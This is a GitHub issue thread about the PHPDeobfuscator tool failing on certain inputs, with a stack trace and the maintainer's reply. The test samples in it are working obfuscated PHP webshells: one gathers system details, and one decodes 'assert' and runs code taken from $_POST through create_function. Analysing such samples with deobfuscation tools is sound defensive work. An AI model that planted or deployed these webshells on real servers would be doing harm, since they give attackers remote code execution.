It does not seem to be able to restore system resource-related functions
Closed this issue · 2 comments
L2ksy0d commented
The test sample is as follows
<?php
$x1c = "\x64\151\163k\146\162\145e\x73\160\x61\x63\x65";
$x1d = "\144i\163\x6b_\164o\164a\154\137\x73\160\x61ce";
$x1e = "\x67\145\x74\x63\x77d";
$x1f = "\x67e\164\x65\x6e\166";
$x20 = "\x67\145t\150\157s\x74by\156\x61\155\145";
$x21 = "\x70\150\x70\x5fu\x6e\141\155e";
$x22 = "\x70\x68\x70\166e\162\163\x69\157n";
$x23 = "\163\x70r\x69\x6et\x66";
$x24 = "\163tr\154e\x6e";
$x25 = "\x73y\163\164\x65\155";
echo "\x66\151\147\x62a\x79\x69\154\157\146i\x6cogba<\x62r\076";
$x0d = $x21();
$x10 = $x1e();
$x11 = $x1f("\x53\x45\122\x56\x45\122\x5f\x53O\106\124\x57A\122\105");
$x12 = $x22();
$x13 = $_SERVER['SERVER_NAME'];
$x16 = $x1c($x10);
$x18 = $x1d($x10);
$x1b = @PHP_OS;
echo "\146\x69\x67\142\x61y\x69\x6co\146i\x6c\x6fg\x62\x61\074\142\162\076";
echo "\165n\141\x6d\145 -\141: $x0d<\x62\162\x3e";
echo "os\072 $x1b\x3c\x62\162\x3e";
echo "\160w\x64\x3a $x10<\x62r>";
echo "p\150p\x3a\040$x12\x3c\x62\162>";
echo "\163\x6f\x66\x74\167a\162\x65:\x20$x11\x3c\x62\162>";
echo "\x73\x65r\x76\x65r\x2d\x6e\141\155\145\x3a\x20$x13\074\142\162\076";This is going to throw an error
$x16 = $x1c($x10);
$x18 = $x1d($x10);
==>
Fatal error: Uncaught PHPDeobfuscator\Exceptions\UnknownValueException:Cannot determine value of node
Another sample:
<?php
$a=@$_POST['aa'];
$bd="base64_decode";
$str="str_replace";
$d=$bd("WVhOelkyRnZibWx0WVdWeWRBPT1pdHN1a2k=");
$d=$str('it','suki',$d);
$d=$str('suki','',$d);
$d=$bd($d);
$d=$str('cao','nima',$d);
$d=$str('nima','',$d);
create_function('',$d($a));
?>
This code create_function('',$d($a)); causes the program to exit abnormally
Fatal error: Uncaught PHPDeobfuscator\Exceptions\UnknownValueException: Cannot determine value of node in C:\Users\Itsuki\Desktop\php-deobf\src\Utils.php on line 55
PHPDeobfuscator\Exceptions\UnknownValueException: : Cannot determine value of node in C:\Users\Itsuki\Desktop\php-deobf\src\Utils.php on line 55
Call Stack:
0.0002 399528 1. {main}() PHPDeobfuscator\index.php:0
0.0019 487640 2. deobfuscate(string(263), string(10), false) PHPDeobfuscator\index.php:29
0.0364 6293768 3. PHPDeobfuscator\Deobfuscator->deobfuscate(array(10)) PHPDeobfuscator\index.php:16
0.0369 6316824 4. PhpParser\NodeTraverser->traverse(array(10)) PHPDeobfuscator\src\Deobfuscator.php:110
0.0369 6316824 5. PhpParser\NodeTraverser->traverseArray(array(10)) PHPDeobfuscator\vendor\nikic\php-parser\lib\PhpParser\NodeTraverser.php:91
0.0404 6407112 6. PhpParser\NodeTraverser->traverseNode(class PhpParser\Node\Stmt\Expression) PHPDeobfuscator\vendor\nikic\php-parser\lib\PhpParser\NodeTraverser.php:223
0.0404 6407144 7. PhpParser\NodeTraverser->traverseNode(class PhpParser\Node\Expr\FuncCall) PHPDeobfuscator\vendor\nikic\php-parser\lib\PhpParser\NodeTraverser.php:146
0.0405 6407272 8. PhpParser\NodeTraverser->traverseArray(array(2)) PHPDeobfuscator\vendor\nikic\php-parser\lib\PhpParser\NodeTraverser.php:114
0.0405 6407984 9. PhpParser\NodeTraverser->traverseNode(class PhpParser\Node\Arg) PHPDeobfuscator\vendor\nikic\php-parser\lib\PhpParser\NodeTraverser.php:223
0.0406 6409168 10. PHPDeobfuscator\Reducer\VariableReducer->leaveNode(class PhpParser\Node\Expr\FuncCall) PHPDeobfuscator\vendor\nikic\php-parser\lib\PhpParser\NodeTraverser.php:153
0.0406 6409264 11. PHPDeobfuscator\Utils::getValue(class PhpParser\Node\Expr\Variable) PHPDeobfuscator\src\Reducer\VariableReducer.php:19
0.0406 6409264 12. PHPDeobfuscator\Utils::getValueRef(class PhpParser\Node\Expr\Variable) PHPDeobfuscator\src\Utils.php:63
When $a is the normal variable value, it can be restored normally.
$a="phpinfo()";
create_function('',$d($a)); ===> create_function('', assert('phpinfo()'));
$a = $_POST['a'];
create_function('',$d($a)); ===> error.$d can be recognized as assert, but the value of $a cannot be recognized.
The AST for the global variable is as follows:
expr: Expr_ArrayDimFetch(
var: Expr_Variable(
name: _POST
)
)
Perhaps you can use PHP-Parser's prettyPrintExpr($node) to extract it as a string.
it needs to improve error handling? Output what has been restored when an error occurs?
simon816 commented
This error seems to be coming from a file src\Reducer\VariableReducer.php which is not part of PHPDeobfuscator, is this something you've added?
L2ksy0d commented
Oh this is a very low-level error, I did not realize it was my own code. I found that it could not restore the variables located in the function parameters, so I wrote VariableReducer.php. I am very sorry for taking up your time